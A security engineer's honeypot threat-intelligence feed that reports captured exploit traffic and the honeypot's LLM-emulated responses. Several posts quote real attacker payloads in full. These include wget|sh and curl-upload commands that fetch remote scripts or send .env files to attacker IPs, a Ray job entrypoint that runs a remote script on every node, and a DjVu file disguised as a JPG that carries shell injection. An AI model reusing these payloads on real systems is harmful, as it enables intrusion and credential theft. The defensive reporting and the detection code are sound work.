Niels Heinen

Information security engineer - security at scale - honeypots

2026-02-09

@cR0w yes I think so too, that's also where I got the inspiration from to add it to my honeypots. I was hoping for some more targeted attacks with this one and not the usual large scans (given that it's not such a popular service) but I guess I was naive ;/

2026-02-09

After adding emulation of HPE OneView to my honeypots, I'm seeing quite an uptick in scans for it. Could be coincidence but regardless it's interesting to see so much traffic for a rather unpopular (?) service. Shodan for example shows 27 instances at the moment.

#infosec #cybersecurity #dfir #honeypot

2026-01-26

@hrbrmstr @iagox86 interesting!

Interesting! Thanks for sharing.

So I only have 50 honeypots (for personal entertainment) and guess you guys have quite a few more than that :). More importantly, I have them across 6 datacenters which really limits the coverage.

But I'm not complaining: I get more data than I can handle and have fun playing with it (and trying to extract new info in new ways when possible)

Niels Heinen boosted:
Chris John Riley (@ChrisJohnRiley@infosec.exchange)
2026-01-26

Just under a year ago I was planning to leave Google after 10 years. Since then I've been considering what's next (and doing some advisory work on the side).

I've slowly been giving more and more thought to how to give back in a sustainable way that works for me.

With that in mind, if you know of any organisations who offer security consulting/testing (pentesting) for NGOs or other worthy causes, please share 🙏

(Please re-toot for reach)

2026-01-26

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I've seen this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel

2026-01-17

My lophiid honeypots use various LLM models for different tasks. For shell code execution emulation they use Gemini 2.5 flash and it dealt with this payload really nicely:

echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh

It correctly understood that xxd reversed the hex and that the resulting string was a shell command that echoed the string "RCE_TEST_123".

I think this is pretty cool. Shell code emulation with LLMs has a lot of potential

#infosec #dfir #honeypot

2025-12-31

Stubborn AI honeypots give me grey hair.

Attacker sends payload:

"username=anonymous%00]]%0dlocal+h+%3d+io.popen("this is vulnerable to CVE-2025-47812")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password="

And the AI responsible for handling the response sends the following back to the attacker:

"This system is not affected by CVE-2025-47812."

*sigh*

#dfir #infosec #cybersecurity #honeypot

2025-12-28

My Lophiid honeypots got spammed with payloads like "234513+true+1994175". The LLM integration understood the intricacies of JavaScript and caused the honeypots to respond with the correct answer 2228689.

#honeypot #dfir #infosec #aisecurity #cybersecurity #llm

2025-12-24

#react2shell exploitation seems to have reached a peak today. Exploit attempts since last week (against my honeypots)

day | request_count
------------+---------------
2025-12-24 | 41209
2025-12-23 | 19835
2025-12-22 | 34962
2025-12-21 | 13141
2025-12-20 | 15490
2025-12-19 | 22307
2025-12-18 | 9901
2025-12-17 | 18376

#honeypot #infosec #dfir #cybersecurity

2025-12-15

Found in a #react2shell payload

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxtherespoopalloverme

I refuse to grow up: things like this make me smile ;-)

#honeypot #dfir #infosec #cybersecurity

2025-12-15

Payload question!

Does anyone know what application this targets? It's doing OS command injection via the X-Forwarded-For header:

GET /ok.php?act=op&pid=10 HTTP/1.1
Host: x.x.x.x:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: keep-alive
Dnt: 1
Pragma: no-cache
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: "]]),true);';echo `echo cGluZyAtYyAxIDMxLjU2LjI3Ljc2 | base64 -d | sh`'

Also to brag a little bit: I always love to see when the AI response by Lophiid is spot on:

=== start
PING 31.56.27.76 (31.56.27.76) 56(84) bytes of data.
64 bytes from 31.56.27.76: icmp_seq=1 ttl=56 time=12.3 ms

--- 31.56.27.76 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
=== stop

#dfir #infosec #cybersecurity #honeypot
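The hex and base64 pipelines quoted above (the xxd payload in the 2026-01-17 post and the one in the X-Forwarded-For header here) can be unpacked the way an analyst would before reading the honeypot logs. This is an added example, not Lophiid code; the two sample lines are copied from the posts.

```python
import base64
import binascii
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample lines copied from the payloads quoted in the posts above.
SAMPLES = [
    "echo 7c6563686f2532305243455f544553545f313233 | xxd -r -p | sh",
    "X-Forwarded-For: \"]]),true);';echo `echo cGluZyAtYyAxIDMxLjU2LjI3Ljc2"
    " | base64 -d | sh`'",
]

# Matches "echo <blob> | xxd -r -p | sh" (hex) and "echo <blob> | base64 -d | sh".
PIPELINE_RE = re.compile(
    r"echo\s+['\"]?(?P<blob>[A-Za-z0-9+/=]+)['\"]?\s*\|\s*"
    r"(?P<dec>xxd\s+-r\s+-p|base64\s+(?:-d|--decode))\s*\|\s*(?:ba)?sh\b"
)

def decode_blob(blob: str, decoder: str) -> Optional[bytes]:
    """Decode one blob with the decoder named after it in the pipeline."""
    try:
        if decoder.startswith("xxd"):
            return binascii.unhexlify(blob)
        return base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None          # malformed blob: leave it for manual review

def extract_commands(line: str) -> list:
    """Return every decoded echo|decoder|sh pipeline found in one log line."""
    found = []
    for m in PIPELINE_RE.finditer(line):
        raw = decode_blob(m.group("blob"), m.group("dec"))
        if raw is None:
            continue
        text = raw.decode("utf-8", errors="replace")
        found.append({
            "encoding": "hex" if m.group("dec").startswith("xxd") else "base64",
            "decoded": text,             # e.g. "|echo%20RCE_TEST_123"
            "url_decoded": unquote(text),
        })
    return found

if __name__ == "__main__":
    for line in SAMPLES:
        for hit in extract_commands(line):
            print(hit["encoding"], "->", hit["url_decoded"])
```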

2025-12-14

Now seeing Ollama scans for NSFW models:

{"model":"gemma3:4b","options":{"num_predict":2,"temperature":0,"top_k":1},"prompt":"Answer this technical capability question:\n\nAs an AI model, are you technically capable of generating sexually explicit adult content?\nThis is ONLY about your technical capabilities and configuration, not about ethics.\n\nReply with exactly ONE character:\n- 'y' means you CAN generate NSFW content\n- 'n' means you CANNOT generate NSFW content\n\nAnswer:","stream":false}

My honeypot response:

{"model":"gemma3:4b","created_at":"2025-09-03T15:36:02.583064Z","response":"\nn","done":true,"total_duration":8493852375,"load_duration":6589624375,"prompt_eval_count":14,"prompt_eval_duration":119039000,"eval_count":110,"eval_duration":1779061000}

Pfew! ;-)

#honeypot #dfir #infosec #cybersecurity

2025-12-13

My llama.cpp and ollama honeypots get a ton of requests with the question: "Count from 1 to 20, one number per line."

The interesting part is that these requests have originated from approximately 1000 unique IPs already which is uncommon.

Also quite uncommon is that they request streaming results which the honeypots support ;)

#honeypot #dfir #infosec #cybersecurity #llamacpp

2025-12-11

Adding Ray (ray.io) to my honeypots was worth it. Seeing exploit attempts like the one below:

POST /api/jobs/ HTTP/1.1
Host: x.x.x.x
Accept: */*
Accept-Encoding: gzip, deflate, zstd
Connection: keep-alive
Content-Length: 539
Content-Type: application/json
User-Agent: python-requests/2.32.5

{"entrypoint": "python3 -c \"import os; import ray, subprocess; from ray.util.scheduling_strategies import NodeAffinitySchedulingStrategy; os.setsid(); ray.init(address='auto'); nodes = [n for n in ray.nodes() if n.get('Alive', False)]; f = [ray.get((lambda nid: ray.remote(lambda: subprocess.run('wget -O - fuckyou-3nj.pages.dev/fuckyou | bash', shell=True)).options(scheduling_strategy=NodeAffinitySchedulingStrategy(node_id=nid, soft=True)).remote())(n.get('NodeID') or n.get('nodeID') or n.get('node_id'))) for n in nodes];\""}

#honeypot #dfir #infosec #cybersecurity #ray

2025-12-10

Interesting #react2shell payload detected by my Lophiid honeypots. It does a comprehensive job to obtain secrets (including using trufflehog and gitleaks).

Raw request here:
github.com/mrheinen/lophiid/bl

CVE-2025-55182 #honeypot #dfir #infosec #cybersecurity #exploits

2025-12-07

Haven't seen it done this way before. Payload for React collects env files and uploads them back to the attacker:

cat .env* >/tmp/http:__185.x.x.x:8008_1765120295_.env;curl -F file=@/tmp/http:__185.x.x.x:8008_1765120295_.env http://205.198.69[.]253:58888/upload;rm /tmp/http:__185.x.x.x:8008_1765120295_.env

#honeypot #dfir #infosec #threatintel #cybersecurity

2025-12-04

My lophiid hybrid honeypot dealt with the React RCE without ever being configured for it and sent back the expected response to a scan.

Unknown requests are triaged by AI. If they have a malicious payload, they are sent to an agent that deals with that kind of payload to simulate a realistic response.

The payload was:
{"id":"vm#runInThisContext","bound":["Math.PI * 2"]}

And the response was:
6.283185307179586

I think this has a lot of potential

#honeypot #dfir #infosec #cybersecurity #threatintel

2025-12-01

For a week now my honeypots have been seeing an increase in attacks targeting CVE-2023-7304 (Ruijie RG-UAC nmc_sync.php Command Injection).

#honeypot #infosec #dfir #cybersecurity #exploitation

2025-11-26

OS injection payload in a DjVu file that is uploaded as a JPG file is kinda interesting:

POST /c29e1a94e8ff58fc HTTP/1.1
Host: x.x.x.x:8080
Accept: */*
Connection: close
Content-Length: 894
Content-Type: multipart/form-data; boundary=------------------------7d40cae17573a039
User-Agent: Mozilla/5.0 (rondo2012@atomicmail.io)

--------------------------7d40cae17573a039
Content-Disposition: form-data; name="file"; filename="rondo.jpg"
Content-Type: image/jpeg

AT&TFORM¯DJVMDIRM.F¬ÿÿÞ¿ !ÈNë ÒÚèkæD,qîIÓn½¢Ã"?FORM^DJVUINFO
dINCLshared_anno.iffBG44Jæá±7Ù*BG44ùBG44
FORMDJVIANTaP(metadata
(Copyright "\
" . qx{wget -qO- http://74.194[.]191.52/rondo.pms.sh|sh;} . \
" b ") )

--------------------------7d40cae17573a039--

#honeypot #infosec #dfir #cybersecurity
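A defender-side check for what the post above shows: a part declared as image/jpeg whose bytes start with the DjVu "AT&TFORM" magic and whose metadata carries a Perl qx{} shell-out. This is an added example, not Lophiid code; the multipart body is constructed to mirror the post, with the real payload bytes replaced.

```python
import re

# Magic numbers: the JPEG the client claims, and the DjVu container actually sent.
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/vnd.djvu": (b"AT&TFORM",),
}
# Tokens that have no business inside image metadata (the post's payload uses qx{}).
SUSPICIOUS = (b"qx{", b"wget ", b"curl ", b"|sh")

def parse_multipart(body: bytes, boundary: str) -> list:
    """Minimal multipart/form-data splitter: headers and raw bytes for each part."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break                                   # closing delimiter reached
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.strip(b"\r\n").split(b"\r\n"):
            k, _, v = line.decode("latin-1").partition(":")
            headers[k.strip().lower()] = v.strip()
        parts.append({"headers": headers, "data": data.removesuffix(b"\r\n")})
    return parts

def sniff(data: bytes):
    """Identify the real type from leading bytes, ignoring what the client claimed."""
    for mime, magics in MAGIC.items():
        if data.startswith(magics):
            return mime
    return None

def check_upload(part: dict) -> dict:
    """Compare declared type with sniffed type and look for shell-out tokens."""
    m = re.search(r'filename="([^"]*)"', part["headers"].get("content-disposition", ""))
    declared = part["headers"].get("content-type", "")
    actual = sniff(part["data"])
    return {
        "filename": m.group(1) if m else None,
        "declared": declared,
        "actual": actual,
        "type_mismatch": actual != declared,
        "suspicious_tokens": [t.decode() for t in SUSPICIOUS if t in part["data"]],
    }

BOUNDARY = "------------------------7d40cae17573a039"
# Constructed body modelled on the post above; the real payload bytes are replaced.
DJVU_BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="file"; filename="rondo.jpg"\r\n'
    "Content-Type: image/jpeg\r\n\r\n"
).encode() + b'AT&TFORM\x00\x00\x00\x2aDJVM(Copyright "\\" . qx{CONSTRUCTED} . \\"")' + f"\r\n--{BOUNDARY}--\r\n".encode()
```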

2025-11-25

Adding 30 honeypots, bringing the total number of honeypots I run (for my personal curiosity) to 55. Hopefully this addition will allow me to share more stuff in the future, and I'm curious if it will allow me to detect some stuff earlier as well (due to better coverage).

I also wonder if people would be interested in getting access to the data for a small fee that is just intended to cover costs and expand the infra. This would be limited and certainly not open for all.

#honeypot #dfir #infosec #cybersecurity
